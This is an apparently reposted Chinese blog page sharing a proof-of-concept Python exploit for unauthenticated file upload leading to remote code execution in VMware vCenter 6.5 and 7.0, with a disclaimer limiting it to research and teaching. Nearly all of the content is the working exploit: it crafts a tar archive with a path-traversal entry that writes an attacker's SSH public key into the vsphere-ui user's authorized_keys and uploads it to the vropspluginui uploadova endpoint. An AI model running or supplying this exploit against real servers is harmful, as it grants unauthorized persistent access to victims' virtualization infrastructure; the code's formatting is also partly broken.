[POC分享]VMware vCenter 6.5 / 7.0 Remote Code Execution
Posted IT鹅
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[POC分享]VMware vCenter 6.5 / 7.0 Remote Code Execution相关的知识,希望对你有一定的参考价值。
免责声明:
本POC程序仅供安全研究与教学之用,使用者将其信息做其他用途,由使用者承担全部法律及连带责任,CSDN博客平台及博主鸿渐之翼不承担任何法律及连带责任。
import tarfile
import os
from io import BytesIO
import requests
proxies =
"http": "http://127.0.0.1:8080",
"https": "http://127.0.0.1:8080",
def return_zip():
with tarfile.open("test.tar", 'w') as tar:
payload = BytesIO()
id_rsa_pub = 'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwgGuwNdSGHKvzHsHt7QImwwJ08Wa/+gHXOt+VwZTD23rLwCGVeYmfKObDY0uFfe2O4jr+sPamgA8As4LwdqtkadBPR+EzZB+PlS66RcVnUnDU4UdMhQjhyj/uv3pdtugugJpB9xaLdrUWwGoOLYA/djxD5hmojGdoYydBezsNhj2xXRyaoq3AZVqh1YLlhpwKnzhodk12a7/7EU+6Zj/ee5jktEwkBsVsDLTTWPpSnzK7r+kAHkbYx8fvO3Fk+9jlwadgbmhHJrpPr8gLEhwvrEnPcK1/j+QXvVkgy2cuYxl9GCUPv2wgZCN50f3wQlaJiektm2S9WkN5dLDdX+X4w=='
tarinfo = tarfile.TarInfo(name='../../../home/vsphere-ui/.ssh/authorized_keys')
f1 = BytesIO(id_rsa_pub.encode())
tarinfo.size = len(f1.read())
f1.seek(0)
tar.addfile(tarinfo, fileobj=f1)
tar.close()
payload.seek(0)
def getshell(url):
files = 'uploadFile':open('test.tar','rb')
try:
r = requests.post(url=url, files=files,proxies=proxies,verify = False).text
print(r)
except:
print('flase')
if __name__ == "__main__":
try:
return_zip()
url="https://192.168.1.1/ui/vropspluginui/rest/services/uploadova"
getshell(url)
except IOError as e:
raise e
以上是关于[POC分享]VMware vCenter 6.5 / 7.0 Remote Code Execution的主要内容,如果未能解决你的问题,请参考以下文章
[POC分享]CVE: 2021-21972:VMware vCenter Server 7.0 - Unauthenticated File Upload
[POC分享]VMware vCenter Server 7.0 未经身份验证的文件上传
[POC分享]VMware vCenter Server 7.0 未经身份验证的文件上传
VMware vSphere ESX 6.5 and vCenter 6.5 Configuration Maximums